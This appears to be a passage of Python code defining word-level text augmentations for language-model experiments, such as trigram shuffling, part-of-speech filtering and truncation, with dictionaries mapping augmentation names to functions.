def shuffle_within_trigrams_first_half(tokenized_text, tokenizer, count):
return shuffle_within_trigrams(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_within_trigrams_first_third(tokenized_text, tokenizer, count):
return shuffle_within_trigrams(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_within_trigrams_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_within_trigrams(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_within_trigrams(tokenized_text, tokenizer, section_length, count):
random.seed(42 + count)
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
first_part_sentences = convert_to_sentences(first_part_text, tokenizer)
first_part_shuffled_sentences = []
for sentence in first_part_sentences:
if not sentence:
continue
split_sentence = convert_to_tokens(sentence, tokenizer)
trigram_shuffled_sentence = trigram_shuffle(split_sentence)
first_part_shuffled_sentences.append(trigram_shuffled_sentence)
return check_tokenization(tokenized_text,
tokenizer.convert_tokens_to_ids(tokenizer.tokenize("".join(first_part_shuffled_sentences + ["<|endofaugmentedtext|>", second_part_text]))), tokenizer, shuffle_within_trigrams)
# ---------- SHUFFLE TRIGRAMS WITHIN SENTENCES ----------
def shuffle_trigrams_within_sentences_first_half(tokenized_text, tokenizer, count):
return shuffle_trigrams_within_sentences(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_trigrams_within_sentences_first_third(tokenized_text, tokenizer, count):
return shuffle_trigrams_within_sentences(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_trigrams_within_sentences_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_trigrams_within_sentences(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_trigrams_within_sentences(tokenized_text, tokenizer, section_length, count):
random.seed(42 + count)
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
first_part_sentences = convert_to_sentences(first_part_text, tokenizer)
first_part_shuffled_sentences = []
for sentence in first_part_sentences:
if not sentence:
continue
split_sentence = convert_to_tokens(sentence, tokenizer)
trigram_shuffled_sentence = shuffle_trigrams(split_sentence)
first_part_shuffled_sentences.append(trigram_shuffled_sentence)
return check_tokenization(tokenized_text,
tokenizer.convert_tokens_to_ids(tokenizer.tokenize("".join(first_part_shuffled_sentences + ["<|endofaugmentedtext|>", second_part_text]))),
tokenizer, shuffle_trigrams_within_sentences)
# ---------- SHUFFLE TRIGRAMS GLOBALLY ----------
def shuffle_trigrams_globally_first_half(tokenized_text, tokenizer, count):
return shuffle_trigrams_globally(tokenized_text, tokenizer, len(tokenized_text) // 2, count)
def shuffle_trigrams_globally_first_third(tokenized_text, tokenizer, count):
return shuffle_trigrams_globally(tokenized_text, tokenizer, len(tokenized_text) // 3, count)
def shuffle_trigrams_globally_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_trigrams_globally(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, count)
def shuffle_trigrams_globally(tokenized_text, tokenizer, section_length, count):
random.seed(42 + count)
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
split_first_part_text = convert_to_tokens(first_part_text, tokenizer)
trigram_shuffled_first_part_text = shuffle_trigrams(split_first_part_text)
return check_tokenization(tokenized_text,
tokenizer.convert_tokens_to_ids(tokenizer.tokenize(trigram_shuffled_first_part_text + "<|endofaugmentedtext|>" + second_part_text)),
tokenizer, shuffle_trigrams_globally)
# ---------- SHUFFLE SENTENCES & REMOVE POS ----------
def shuffle_sentences_remove_all_but_nouns_first_half(tokenized_text, tokenizer, count):
return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, ("NOUN", "PRON", "PROPN"), count)
def shuffle_sentences_remove_all_but_nouns_first_third(tokenized_text, tokenizer, count):
return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN"), count)
def shuffle_sentences_remove_all_but_nouns_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN"), count)
def shuffle_sentences_remove_all_but_nouns_and_verbs_first_half(tokenized_text, tokenizer, count):
return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 2, ("NOUN", "PRON", "PROPN", "VERB"), count)
def shuffle_sentences_remove_all_but_nouns_and_verbs_first_third(tokenized_text, tokenizer, count):
return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB"), count)
def shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds(tokenized_text, tokenizer, count):
return shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, ("NOUN", "PRON", "PROPN", "VERB"), count)
def shuffle_sentences_remove_all_but_pos(tokenized_text, tokenizer, section_length, pos_list, count):
shuffled_tokenized_text = shuffle_sentences(tokenized_text, tokenizer, section_length, count)
if shuffled_tokenized_text:
return remove_all_but_pos(shuffled_tokenized_text, tokenizer, section_length, pos_list)
else:
return False
# ---------- NER ----------
def remove_all_but_named_entities_first_half(tokenized_text, tokenizer, count):
return remove_all_but_named_entities(tokenized_text, tokenizer, len(tokenized_text) // 2)
def remove_all_but_named_entities_first_third(tokenized_text, tokenizer, count):
return remove_all_but_named_entities(tokenized_text, tokenizer, len(tokenized_text) // 3)
def remove_all_but_named_entities_first_two_thirds(tokenized_text, tokenizer, count):
return remove_all_but_named_entities(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3)
def remove_all_but_named_entities(tokenized_text, tokenizer, section_length):
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
nlp_first_part_text = nlp(first_part_text)
first_part_text = " ".join(map(lambda x: x.text, nlp_first_part_text.ents))
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(first_part_text + "<|endofaugmentedtext|>" + second_part_text)), tokenizer, remove_all_but_pos)
# ---------- FUNCTION WORDS ----------
def remove_all_but_function_words_first_half(tokenized_text, tokenizer, count):
return remove_all_but_function_words(tokenized_text, tokenizer, len(tokenized_text) // 2)
def remove_all_but_function_words_first_third(tokenized_text, tokenizer, count):
return remove_all_but_function_words(tokenized_text, tokenizer, len(tokenized_text) // 3)
def remove_all_but_function_words_first_two_thirds(tokenized_text, tokenizer, count):
return remove_all_but_function_words(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3)
def remove_all_but_function_words(tokenized_text, tokenizer, section_length):
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
nlp_first_part_text = nlp(first_part_text)
first_part_text_list = []
for token in nlp_first_part_text:
if token.pos_ not in ("NOUN", "PRON", "PROPN", "VERB", "ADJ", "ADV"):
first_part_text_list.append(token.text)
first_part_text = " ".join(first_part_text_list)
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(first_part_text + "<|endofaugmentedtext|>" + second_part_text)), tokenizer, remove_all_but_pos)
# ---------- RARE WORDS ----------
def remove_all_but_rare_words_first_half(tokenized_text, tokenizer, count, rare_words):
return remove_all_but_rare_words(tokenized_text, tokenizer, len(tokenized_text) // 2, rare_words)
def remove_all_but_rare_words_first_third(tokenized_text, tokenizer, count, rare_words):
return remove_all_but_rare_words(tokenized_text, tokenizer, len(tokenized_text) // 3, rare_words)
def remove_all_but_rare_words_first_two_thirds(tokenized_text, tokenizer, count, rare_words):
return remove_all_but_rare_words(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, rare_words)
def remove_all_but_rare_words(tokenized_text, tokenizer, section_length, rare_words):
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
split_first_part_text = convert_to_tokens(first_part_text, tokenizer)
first_part_text_list = []
for word in split_first_part_text:
if word.lower().strip() in rare_words:
first_part_text_list.append(word.strip())
first_part_text = " ".join(first_part_text_list)
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(first_part_text + "<|endofaugmentedtext|>" + second_part_text)), tokenizer, remove_all_but_rare_words)
# ---------- COMMON WORDS ----------
def remove_all_but_common_words_first_half(tokenized_text, tokenizer, count, common_words):
return remove_all_but_common_words(tokenized_text, tokenizer, len(tokenized_text) // 2, common_words)
def remove_all_but_common_words_first_third(tokenized_text, tokenizer, count, common_words):
return remove_all_but_common_words(tokenized_text, tokenizer, len(tokenized_text) // 3, common_words)
def remove_all_but_common_words_first_two_thirds(tokenized_text, tokenizer, count, common_words):
return remove_all_but_common_words(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3, common_words)
def remove_all_but_common_words(tokenized_text, tokenizer, section_length, common_words):
first_part_tokens, second_part_tokens = divide_into_sections(tokenized_text, tokenizer, section_length)
first_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(first_part_tokens))
split_first_part_text = convert_to_tokens(first_part_text, tokenizer)
first_part_text_list = []
for word in split_first_part_text:
if word.lower().strip() in common_words:
first_part_text_list.append(word.strip())
first_part_text = " ".join(first_part_text_list)
second_part_text = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(second_part_tokens))
return check_tokenization(tokenized_text, tokenizer.convert_tokens_to_ids(tokenizer.tokenize(first_part_text + "<|endofaugmentedtext|>" + second_part_text)), tokenizer, remove_all_but_common_words)
# ---------- TRUNCATE AND PAD ----------
def truncate_and_pad_first_half(tokenized_text, tokenizer, count):
return truncate_and_pad(tokenized_text, tokenizer, len(tokenized_text) // 2)
def truncate_and_pad_first_third(tokenized_text, tokenizer, count):
return truncate_and_pad(tokenized_text, tokenizer, len(tokenized_text) // 3)
def truncate_and_pad_first_two_thirds(tokenized_text, tokenizer, count):
return truncate_and_pad(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3)
def truncate_and_pad(tokenized_text, tokenizer, section_length):
truncate_index = random.randint(0, section_length)
return check_tokenization(tokenized_text,
tokenized_text[truncate_index:section_length] + tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>")) + tokenized_text[section_length:],
tokenizer,
truncate_and_pad)
# ---------- PAD ----------
def pad_first_half(tokenized_text, tokenizer, count):
return pad(tokenized_text, tokenizer, len(tokenized_text) // 2)
def pad_first_third(tokenized_text, tokenizer, count):
return pad(tokenized_text, tokenizer, len(tokenized_text) // 3)
def pad_first_two_thirds(tokenized_text, tokenizer, count):
return pad(tokenized_text, tokenizer, 2 * len(tokenized_text) // 3)
def pad(tokenized_text, tokenizer, section_length):
return check_tokenization(tokenized_text,
tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>")) + tokenized_text[section_length:],
tokenizer,
pad)
# ---------- IDENTITY ----------
def identity(tokenized_text, tokenizer):
return tokenized_text
def identity_first_third(tokenized_text, tokenizer):
return tokenized_text
def identity_first_two_thirds(tokenized_text, tokenizer):
return tokenized_text
# ---------- FUNCTION MAPPINGS ----------
HALF_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
"identity_half": identity,
"shuffle_first_half": shuffle_first_half,
"shuffle_sentences_first_half": shuffle_sentences_first_half,
"shuffle_within_sentences_first_half": shuffle_within_sentences_first_half,
"shuffle_within_sentences_low_pmi_first_half": shuffle_within_sentences_low_pmi_first_half,
"shuffle_within_sentences_high_pmi_first_half": shuffle_within_sentences_high_pmi_first_half,
"remove_all_but_nouns_first_half": remove_all_but_nouns_first_half,
"remove_all_but_nouns_and_verbs_first_half": remove_all_but_nouns_and_verbs_first_half,
"remove_all_but_nouns_verbs_and_adjectives_first_half": remove_all_but_nouns_verbs_and_adjectives_first_half,
"remove_all_but_named_entities_first_half": remove_all_but_named_entities_first_half,
"remove_all_but_function_words_first_half": remove_all_but_function_words_first_half,
"replace_all_but_nouns_first_half": replace_all_but_nouns_first_half,
"replace_all_but_nouns_and_verbs_first_half": replace_all_but_nouns_and_verbs_first_half,
"replace_all_but_nouns_verbs_and_adjectives_first_half": replace_all_but_nouns_verbs_and_adjectives_first_half,
"shuffle_remove_all_but_nouns_first_half": shuffle_remove_all_but_nouns_first_half,
"shuffle_remove_all_but_nouns_and_verbs_first_half": shuffle_remove_all_but_nouns_and_verbs_first_half,
"shuffle_sentences_remove_all_but_nouns_first_half": shuffle_sentences_remove_all_but_nouns_first_half,
"shuffle_sentences_remove_all_but_nouns_and_verbs_first_half": shuffle_sentences_remove_all_but_nouns_and_verbs_first_half,
"remove_all_but_nouns_and_verbs_fill_first_half": remove_all_but_nouns_and_verbs_fill_first_half,
"remove_all_but_rare_words_first_half": remove_all_but_rare_words_first_half,
"remove_all_but_common_words_first_half": remove_all_but_common_words_first_half,
"truncate_and_pad_first_half": truncate_and_pad_first_half,
"pad_first_half": pad_first_half,
"shuffle_within_trigrams_first_half": shuffle_within_trigrams_first_half,
"shuffle_trigrams_within_sentences_first_half": shuffle_trigrams_within_sentences_first_half,
"shuffle_trigrams_globally_first_half": shuffle_trigrams_globally_first_half,
"remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half,
}
THIRD_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
"identity_third": identity,
"shuffle_first_third": shuffle_first_third,
"shuffle_first_two_thirds": shuffle_first_two_thirds,
"shuffle_sentences_first_third": shuffle_sentences_first_third,
"shuffle_sentences_first_two_thirds": shuffle_sentences_first_two_thirds,
"shuffle_within_sentences_first_third": shuffle_within_sentences_first_third,
"shuffle_within_sentences_first_two_thirds": shuffle_within_sentences_first_two_thirds,
"shuffle_within_sentences_low_pmi_first_third": shuffle_within_sentences_low_pmi_first_third,
"shuffle_within_sentences_low_pmi_first_two_thirds": shuffle_within_sentences_low_pmi_first_two_thirds,
"shuffle_within_sentences_high_pmi_first_third": shuffle_within_sentences_high_pmi_first_third,
"shuffle_within_sentences_high_pmi_first_two_thirds": shuffle_within_sentences_high_pmi_first_two_thirds,
"remove_all_but_nouns_first_third": remove_all_but_nouns_first_third,
"remove_all_but_nouns_first_two_thirds": remove_all_but_nouns_first_two_thirds,
"remove_all_but_nouns_and_verbs_first_third": remove_all_but_nouns_and_verbs_first_third,
"remove_all_but_nouns_and_verbs_first_two_thirds": remove_all_but_nouns_and_verbs_first_two_thirds,
"remove_all_but_nouns_verbs_and_adjectives_first_third": remove_all_but_nouns_verbs_and_adjectives_first_third,
"remove_all_but_nouns_verbs_and_adjectives_first_two_thirds": remove_all_but_nouns_verbs_and_adjectives_first_two_thirds,
"remove_all_but_named_entities_first_third": remove_all_but_named_entities_first_third,
"remove_all_but_named_entities_first_two_thirds": remove_all_but_named_entities_first_two_thirds,
"remove_all_but_function_words_first_third": remove_all_but_function_words_first_third,
"remove_all_but_function_words_first_two_thirds": remove_all_but_function_words_first_two_thirds,
"replace_all_but_nouns_first_third": replace_all_but_nouns_first_third,
"replace_all_but_nouns_first_two_thirds": replace_all_but_nouns_first_two_thirds,
"replace_all_but_nouns_and_verbs_first_third": replace_all_but_nouns_and_verbs_first_third,
"replace_all_but_nouns_and_verbs_first_two_thirds": replace_all_but_nouns_and_verbs_first_two_thirds,
"replace_all_but_nouns_verbs_and_adjectives_first_third": replace_all_but_nouns_verbs_and_adjectives_first_third,
"replace_all_but_nouns_verbs_and_adjectives_first_two_thirds": replace_all_but_nouns_verbs_and_adjectives_first_two_thirds,
"shuffle_remove_all_but_nouns_first_third": shuffle_remove_all_but_nouns_first_third,
"shuffle_remove_all_but_nouns_first_two_thirds": shuffle_remove_all_but_nouns_first_two_thirds,
"shuffle_remove_all_but_nouns_and_verbs_first_third": shuffle_remove_all_but_nouns_and_verbs_first_third,
"shuffle_remove_all_but_nouns_and_verbs_first_two_thirds": shuffle_remove_all_but_nouns_and_verbs_first_two_thirds,
"shuffle_sentences_remove_all_but_nouns_first_third": shuffle_sentences_remove_all_but_nouns_first_third,
"shuffle_sentences_remove_all_but_nouns_first_two_thirds": shuffle_sentences_remove_all_but_nouns_first_two_thirds,
"shuffle_sentences_remove_all_but_nouns_and_verbs_first_third": shuffle_sentences_remove_all_but_nouns_and_verbs_first_third,
"shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds": shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds,
"remove_all_but_nouns_and_verbs_fill_first_third": remove_all_but_nouns_and_verbs_fill_first_third,
"remove_all_but_nouns_and_verbs_fill_first_two_thirds": remove_all_but_nouns_and_verbs_fill_first_two_thirds,
"remove_all_but_rare_words_first_third": remove_all_but_rare_words_first_third,
"remove_all_but_rare_words_first_two_thirds": remove_all_but_rare_words_first_two_thirds,
"remove_all_but_common_words_first_third": remove_all_but_common_words_first_third,
"remove_all_but_common_words_first_two_thirds": remove_all_but_common_words_first_two_thirds,
"truncate_and_pad_first_third": truncate_and_pad_first_third,
"truncate_and_pad_first_two_thirds": truncate_and_pad_first_two_thirds,
"pad_first_third": pad_first_third,
"pad_first_third_two_thirds": pad_first_two_thirds,
"shuffle_within_trigrams_first_third": shuffle_within_trigrams_first_third,
"shuffle_within_trigrams_first_two_thirds": shuffle_within_trigrams_first_two_thirds,
"shuffle_trigrams_within_sentences_first_third": shuffle_trigrams_within_sentences_first_third,
"shuffle_trigrams_within_sentences_first_two_thirds": shuffle_trigrams_within_sentences_first_two_thirds,
"shuffle_trigrams_globally_first_third": shuffle_trigrams_globally_first_third,
"shuffle_trigrams_globally_first_two_thirds": shuffle_trigrams_globally_first_two_thirds,
"remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third,
"remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds,
}
QUARTER_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
"identity_quarter": identity,
"shuffle_first_half_quarter": shuffle_first_half,
"shuffle_sentences_first_half_quarter": shuffle_sentences_first_half,
"shuffle_within_sentences_first_half_quarter": shuffle_within_sentences_first_half,
"shuffle_within_sentences_low_pmi_first_half_quarter": shuffle_within_sentences_low_pmi_first_half,
"shuffle_within_sentences_high_pmi_first_half_quarter": shuffle_within_sentences_high_pmi_first_half,
"remove_all_but_nouns_first_half_quarter": remove_all_but_nouns_first_half,
"remove_all_but_nouns_and_verbs_first_half_quarter": remove_all_but_nouns_and_verbs_first_half,
"remove_all_but_nouns_verbs_and_adjectives_first_half_quarter": remove_all_but_nouns_verbs_and_adjectives_first_half,
"remove_all_but_named_entities_first_half_quarter": remove_all_but_named_entities_first_half,
"remove_all_but_function_words_first_half_quarter": remove_all_but_function_words_first_half,
"replace_all_but_nouns_first_half_quarter": replace_all_but_nouns_first_half,
"replace_all_but_nouns_and_verbs_first_half_quarter": replace_all_but_nouns_and_verbs_first_half,
"replace_all_but_nouns_verbs_and_adjectives_first_half_quarter": replace_all_but_nouns_verbs_and_adjectives_first_half,
"shuffle_remove_all_but_nouns_first_half_quarter": shuffle_remove_all_but_nouns_first_half,
"shuffle_remove_all_but_nouns_and_verbs_first_half_quarter": shuffle_remove_all_but_nouns_and_verbs_first_half,
"shuffle_sentences_remove_all_but_nouns_first_half_quarter": shuffle_sentences_remove_all_but_nouns_first_half,
"shuffle_sentences_remove_all_but_nouns_and_verbs_first_half_quarter": shuffle_sentences_remove_all_but_nouns_and_verbs_first_half,
"remove_all_but_nouns_and_verbs_fill_first_half_quarter": remove_all_but_nouns_and_verbs_fill_first_half,
"remove_all_but_rare_words_first_half_quarter": remove_all_but_rare_words_first_half,
"remove_all_but_common_words_first_half_quarter": remove_all_but_common_words_first_half,
"truncate_and_pad_first_half_quarter": truncate_and_pad_first_half,
"pad_first_half_quarter": pad_first_half,
"shuffle_within_trigrams_first_half_quarter": shuffle_within_trigrams_first_half,
"shuffle_trigrams_within_sentences_first_half_quarter": shuffle_trigrams_within_sentences_first_half,
"shuffle_trigrams_globally_first_half_quarter": shuffle_trigrams_globally_first_half,
"remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half_quarter": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half,
}
SIXTH_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
"identity_sixth": identity,
"shuffle_first_third_sixth": shuffle_first_third,
"shuffle_first_two_thirds_sixth": shuffle_first_two_thirds,
"shuffle_sentences_first_third_sixth": shuffle_sentences_first_third,
"shuffle_sentences_first_two_thirds_sixth": shuffle_sentences_first_two_thirds,
"shuffle_within_sentences_first_third_sixth": shuffle_within_sentences_first_third,
"shuffle_within_sentences_first_two_thirds_sixth": shuffle_within_sentences_first_two_thirds,
"shuffle_within_sentences_low_pmi_first_third_sixth": shuffle_within_sentences_low_pmi_first_third,
"shuffle_within_sentences_low_pmi_first_two_thirds_sixth": shuffle_within_sentences_low_pmi_first_two_thirds,
"shuffle_within_sentences_high_pmi_first_third_sixth": shuffle_within_sentences_high_pmi_first_third,
"shuffle_within_sentences_high_pmi_first_two_thirds_sixth": shuffle_within_sentences_high_pmi_first_two_thirds,
"remove_all_but_nouns_first_third_sixth": remove_all_but_nouns_first_third,
"remove_all_but_nouns_first_two_thirds_sixth": remove_all_but_nouns_first_two_thirds,
"remove_all_but_nouns_and_verbs_first_third_sixth": remove_all_but_nouns_and_verbs_first_third,
"remove_all_but_nouns_and_verbs_first_two_thirds_sixth": remove_all_but_nouns_and_verbs_first_two_thirds,
"remove_all_but_nouns_verbs_and_adjectives_first_third_sixth": remove_all_but_nouns_verbs_and_adjectives_first_third,
"remove_all_but_nouns_verbs_and_adjectives_first_two_thirds_sixth": remove_all_but_nouns_verbs_and_adjectives_first_two_thirds,
"remove_all_but_named_entities_first_third_sixth": remove_all_but_named_entities_first_third,
"remove_all_but_named_entities_first_two_thirds_sixth": remove_all_but_named_entities_first_two_thirds,
"remove_all_but_function_words_first_third_sixth": remove_all_but_function_words_first_third,
"remove_all_but_function_words_first_two_thirds_sixth": remove_all_but_function_words_first_two_thirds,
"replace_all_but_nouns_first_third_sixth": replace_all_but_nouns_first_third,
"replace_all_but_nouns_first_two_thirds_sixth": replace_all_but_nouns_first_two_thirds,
"replace_all_but_nouns_and_verbs_first_third_sixth": replace_all_but_nouns_and_verbs_first_third,
"replace_all_but_nouns_and_verbs_first_two_thirds_sixth": replace_all_but_nouns_and_verbs_first_two_thirds,
"replace_all_but_nouns_verbs_and_adjectives_first_third_sixth": replace_all_but_nouns_verbs_and_adjectives_first_third,
"replace_all_but_nouns_verbs_and_adjectives_first_two_thirds_sixth": replace_all_but_nouns_verbs_and_adjectives_first_two_thirds,
"shuffle_remove_all_but_nouns_first_third_sixth": shuffle_remove_all_but_nouns_first_third,
"shuffle_remove_all_but_nouns_first_two_thirds_sixth": shuffle_remove_all_but_nouns_first_two_thirds,
"shuffle_remove_all_but_nouns_and_verbs_first_third_sixth": shuffle_remove_all_but_nouns_and_verbs_first_third,
"shuffle_remove_all_but_nouns_and_verbs_first_two_thirds_sixth": shuffle_remove_all_but_nouns_and_verbs_first_two_thirds,
"shuffle_sentences_remove_all_but_nouns_first_third_sixth": shuffle_sentences_remove_all_but_nouns_first_third,
"shuffle_sentences_remove_all_but_nouns_first_two_thirds_sixth": shuffle_sentences_remove_all_but_nouns_first_two_thirds,
"shuffle_sentences_remove_all_but_nouns_and_verbs_first_third_sixth": shuffle_sentences_remove_all_but_nouns_and_verbs_first_third,
"shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds_sixth": shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds,
"remove_all_but_nouns_and_verbs_fill_first_third_sixth": remove_all_but_nouns_and_verbs_fill_first_third,
"remove_all_but_nouns_and_verbs_fill_first_two_thirds_sixth": remove_all_but_nouns_and_verbs_fill_first_two_thirds,
"remove_all_but_rare_words_first_third_sixth": remove_all_but_rare_words_first_third,
"remove_all_but_rare_words_first_two_thirds_sixth": remove_all_but_rare_words_first_two_thirds,
"remove_all_but_common_words_first_third_sixth": remove_all_but_common_words_first_third,
"remove_all_but_common_words_first_two_thirds_sixth": remove_all_but_common_words_first_two_thirds,
"truncate_and_pad_first_third_sixth": truncate_and_pad_first_third,
"truncate_and_pad_first_two_thirds_sixth": truncate_and_pad_first_two_thirds,
"pad_first_third_sixth": pad_first_third,
"pad_first_third_two_thirds_sixth": pad_first_two_thirds,
"shuffle_within_trigrams_first_third_sixth": shuffle_within_trigrams_first_third,
"shuffle_within_trigrams_first_two_thirds_sixth": shuffle_within_trigrams_first_two_thirds,
"shuffle_trigrams_within_sentences_first_third_sixth": shuffle_trigrams_within_sentences_first_third,
"shuffle_trigrams_within_sentences_first_two_thirds_sixth": shuffle_trigrams_within_sentences_first_two_thirds,
"shuffle_trigrams_globally_first_third_sixth": shuffle_trigrams_globally_first_third,
"shuffle_trigrams_globally_first_two_thirds_sixth": shuffle_trigrams_globally_first_two_thirds,
"remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third_sixth": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_third,
"remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds_sixth": remove_all_but_nouns_verbs_adjectives_and_adverbs_first_two_thirds,
}
FULL_OVERLAPPING_WORD_LEVEL_AUGMENTATION_MAPPING = {
"identity_full": identity,
"shuffle_first_half_full": shuffle_first_half,
"shuffle_first_third_full": shuffle_first_third,
"shuffle_first_two_thirds_full": shuffle_first_two_thirds,
"shuffle_sentences_first_half_full": shuffle_sentences_first_half,
"shuffle_sentences_first_third_full": shuffle_sentences_first_third,
"shuffle_sentences_first_two_thirds_full": shuffle_sentences_first_two_thirds,
"shuffle_within_sentences_first_half_full": shuffle_within_sentences_first_half,
"shuffle_within_sentences_first_third_full": shuffle_within_sentences_first_third,
"shuffle_within_sentences_first_two_thirds_full": shuffle_within_sentences_first_two_thirds,
"shuffle_within_sentences_low_pmi_first_half_full": shuffle_within_sentences_low_pmi_first_half,
"shuffle_within_sentences_low_pmi_first_third_full": shuffle_within_sentences_low_pmi_first_third,
"shuffle_within_sentences_low_pmi_first_two_thirds_full": shuffle_within_sentences_low_pmi_first_two_thirds,
"shuffle_within_sentences_high_pmi_first_half_full": shuffle_within_sentences_high_pmi_first_half,
"shuffle_within_sentences_high_pmi_first_third_full": shuffle_within_sentences_high_pmi_first_third,
"shuffle_within_sentences_high_pmi_first_two_thirds_full": shuffle_within_sentences_high_pmi_first_two_thirds,
"remove_all_but_nouns_first_half_full": remove_all_but_nouns_first_half,
"remove_all_but_nouns_first_third_full": remove_all_but_nouns_first_third,
"remove_all_but_nouns_first_two_thirds_full": remove_all_but_nouns_first_two_thirds,
"remove_all_but_nouns_and_verbs_first_half_full": remove_all_but_nouns_and_verbs_first_half,
"remove_all_but_nouns_and_verbs_first_third_full": remove_all_but_nouns_and_verbs_first_third,
"remove_all_but_nouns_and_verbs_first_two_thirds_full": remove_all_but_nouns_and_verbs_first_two_thirds,
"remove_all_but_nouns_verbs_and_adjectives_first_half_full": remove_all_but_nouns_verbs_and_adjectives_first_half,
"remove_all_but_nouns_verbs_and_adjectives_first_third_full": remove_all_but_nouns_verbs_and_adjectives_first_third,
"remove_all_but_nouns_verbs_and_adjectives_first_two_thirds_full": remove_all_but_nouns_verbs_and_adjectives_first_two_thirds,
"remove_all_but_named_entities_first_half_full": remove_all_but_named_entities_first_half,
"remove_all_but_named_entities_first_third_full": remove_all_but_named_entities_first_third,
"remove_all_but_named_entities_first_two_thirds_full": remove_all_but_named_entities_first_two_thirds,
"remove_all_but_function_words_first_half_full": remove_all_but_function_words_first_half,
"remove_all_but_function_words_first_third_full": remove_all_but_function_words_first_third,
"remove_all_but_function_words_first_two_thirds_full": remove_all_but_function_words_first_two_thirds,
"replace_all_but_nouns_first_half_full": replace_all_but_nouns_first_half,
"replace_all_but_nouns_first_third_full": replace_all_but_nouns_first_third,
"replace_all_but_nouns_first_two_thirds_full": replace_all_but_nouns_first_two_thirds,
"replace_all_but_nouns_and_verbs_first_half_full": replace_all_but_nouns_and_verbs_first_half,
"replace_all_but_nouns_and_verbs_first_third_full": replace_all_but_nouns_and_verbs_first_third,
"replace_all_but_nouns_and_verbs_first_two_thirds_full": replace_all_but_nouns_and_verbs_first_two_thirds,
"replace_all_but_nouns_verbs_and_adjectives_first_half_full": replace_all_but_nouns_verbs_and_adjectives_first_half,
